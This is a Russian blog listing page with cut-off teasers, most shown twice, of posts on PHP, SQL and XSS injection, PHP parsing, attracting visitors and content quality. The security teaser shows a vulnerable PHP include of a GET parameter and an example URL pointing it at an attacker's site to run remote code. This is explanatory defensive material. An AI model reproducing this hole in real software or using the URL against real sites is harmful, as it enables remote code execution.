Добавить новый блогКак предотвратить PHP, SQL и XSS инъекции (Безопасность)
Я конечно не супер-профессионал по безопасности, но некоторые познания в области безопасности php скриптов есть. Итак, часто встречающиеся дыры в php скриптах:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
Если ввести такой URL:
- PHP инъекция.
- SQL инъекция.
- XSS.
Вот про борьбу с этими уязвимостями и пойдёт речь. Статей по безопасности конечно уйма, но всё же, внесу и свою лепту.
Что же это такое PHP-инъекция?
PHP-инъекция - способ взлома сайта путём выполнения на сайте стороннего PHP кода. Например, вы хотите подключить необходимый файл, в зависимости от параметра, пришедшего из GET:
# Получаем имя файла
$action = isset($_GET['action']) ? $_GET['action'] : null;
# Тут какие-то действия
# ...
# Подключаем файл
include($action);Если ввести такой URL:
http://ваш_сайт/ваш_файл.php?action=http://сайт_взломщика/файл то, если в файле php.ini на вашем сервере включена директива allow_url_include, злоумышленник может внести код, который хочет выполнить на вашем сайте, в тот файл, на который он указал ссылку и код успешно выполнится на вашем сайте....- Жалоба
Быстрое копирование информации с Web-страницы (Парсинг на PHP)
Заметил, что на форумах часто задают вопросы про парсинг сайтов. Решил написать небольшую статью, в которой попытаюсь объяснить азы парсинга и привести некоторые примеры работы с ним.
Итак, начнём с самого начала.
Что такое парсинг? Это слово является переведенным, а вернее просто написанным на кириллице (как это часто встречается в интернете) словом из английского языка "parsing". Оно переводится с английского как "разбор". Т.е. парсинг - это анализ и разбор какой-либо web-страницы с целью получения информации, содержащейся на ней.
Можно подумать: а зачем вообще нужно получать информацию с web-страницы таким способом? Приведу пример: допустим, Вам нужна база данных MySQL с марками и моделями автомобилей (недавно как раз мне пришлось писать парсер именно для этого). Как Вам её получить? Есть два варианта. Первый - это купить такую базу у человека, у которого она есть. Второй - составить её самому.
Если Вас устраивает первый вариант - Вы, не тратя время, покупаете её и всё. Вот так...
Итак, начнём с самого начала.
Что такое парсинг? Это слово является переведенным, а вернее просто написанным на кириллице (как это часто встречается в интернете) словом из английского языка "parsing". Оно переводится с английского как "разбор". Т.е. парсинг - это анализ и разбор какой-либо web-страницы с целью получения информации, содержащейся на ней.
Можно подумать: а зачем вообще нужно получать информацию с web-страницы таким способом? Приведу пример: допустим, Вам нужна база данных MySQL с марками и моделями автомобилей (недавно как раз мне пришлось писать парсер именно для этого). Как Вам её получить? Есть два варианта. Первый - это купить такую базу у человека, у которого она есть. Второй - составить её самому.
Если Вас устраивает первый вариант - Вы, не тратя время, покупаете её и всё. Вот так...
Как привлечь посетителей на сайт?
Сейчас это самый актуальный вопрос для всех владельцев сайтов. Ведь все они столкнулись с одной проблемой — создать красивый и функциональный сервер еще не достаточно, чтобы его все читали. Ведь главная задача состоит в том, чтобы его читали, на него заходили, пользовались им, как привычным.
Привлечение посетителей — главная цель, достичь которую можно следующими способами.
Поисковики или поисковые системы. Продвигать материал с помощью поисковых систем — самый дешевый и популярные метод, однако, здесь может возникнуть множество проблем и вопросов. Здесь нужно обладать навыками в продвижении по SEO. Главным плюсом такого привлечения является то, что посетители думают, что они сами нашли ваш сайт, что вызывает доверие, а значит, постоянных пользователей.
Каталоги. Первым шагом к раскрутке сайта является прописка его в Интернет каталоге. Для этого стоит определить направление и тематику вашего сайта. Здесь же можно подать объявление о сайт, однако здесь стоит разбираться какие доски...
Привлечение посетителей — главная цель, достичь которую можно следующими способами.
Поисковики или поисковые системы. Продвигать материал с помощью поисковых систем — самый дешевый и популярные метод, однако, здесь может возникнуть множество проблем и вопросов. Здесь нужно обладать навыками в продвижении по SEO. Главным плюсом такого привлечения является то, что посетители думают, что они сами нашли ваш сайт, что вызывает доверие, а значит, постоянных пользователей.
Каталоги. Первым шагом к раскрутке сайта является прописка его в Интернет каталоге. Для этого стоит определить направление и тематику вашего сайта. Здесь же можно подать объявление о сайт, однако здесь стоит разбираться какие доски...
Как привлечь новых пользователей на сайт
Для многих интернет-ресурсов всегда будет актуален вопрос: как привлечь на портал новых посетителей и сохранить старых? Именно об этом сегодня и пойдёт речь. Но надо учесть, что помимо привлечения новичков, никогда не надо забывать о постоянных посетителей сайта. Так как их уход — это прямые убытки, а для того, чтобы оставить их на сайте требуется затратить гораздо меньше ресурсов. Кроме того, методы, которыми вы привлекаете новых клиентов, могут помочь вам удержать старых. Конечно, основным методом привлечения клиентов является реклама. Её можно давать на ресурсах со схожей тематикой, размещать баннеры на популярных форумах и порталах. Виды данной рекламы ограничиваются лишь вашим изображением.
Если на вашем сайте есть контент или раздел с новостями, то его нужно регулярно обновлять. Постоянно нужно добавлять новые статьи, рецензии, интервью. На ваш сайт должны регулярно заходить люди за новой порцией контента, тем более, если он качественный. Поэтому, регулярно обновляя сайт, вы...
Если на вашем сайте есть контент или раздел с новостями, то его нужно регулярно обновлять. Постоянно нужно добавлять новые статьи, рецензии, интервью. На ваш сайт должны регулярно заходить люди за новой порцией контента, тем более, если он качественный. Поэтому, регулярно обновляя сайт, вы...
Как повысить качество контента на сайте
Жалобы на качество контента на сайте могут быть у каждого оптимизатора. И к ним стоит отнестись очень внимательно: даже безобидная информация в состоянии испортить общее впечатление о целом ресурсе, заставив пользователя усомниться в его авторитетности. Поэтому важно, чтобы контент вашего сайта был написан на высоком профессиональном уровне.
Как понять, что контент для сайта низкого качества?
- Информация имеет низкую уникальность.
- В тексте недостаточно знаков. К примеру, для интернет-магазинов описание карточек товаров не должно быть менее 300 символов, а минимальный предел новостной или информационной статьи – 1500 знаков.
- Наличие дублей страниц с идентичным содержанием, заголовками и meta-тегами.
- Есть ошибки в верстке и оформлении.
Если поисковые системы обнаружат обилие низкокачественного контента, их доверие упадет до нуля, что ухудшит позиции проекта при выдаче. Поэтому работа с контентом сайта очень важна.
Почему контент страниц сайта должен быть качественным?
Записи с...
Как понять, что контент для сайта низкого качества?
- Информация имеет низкую уникальность.
- В тексте недостаточно знаков. К примеру, для интернет-магазинов описание карточек товаров не должно быть менее 300 символов, а минимальный предел новостной или информационной статьи – 1500 знаков.
- Наличие дублей страниц с идентичным содержанием, заголовками и meta-тегами.
- Есть ошибки в верстке и оформлении.
Если поисковые системы обнаружат обилие низкокачественного контента, их доверие упадет до нуля, что ухудшит позиции проекта при выдаче. Поэтому работа с контентом сайта очень важна.
Почему контент страниц сайта должен быть качественным?
Записи с...
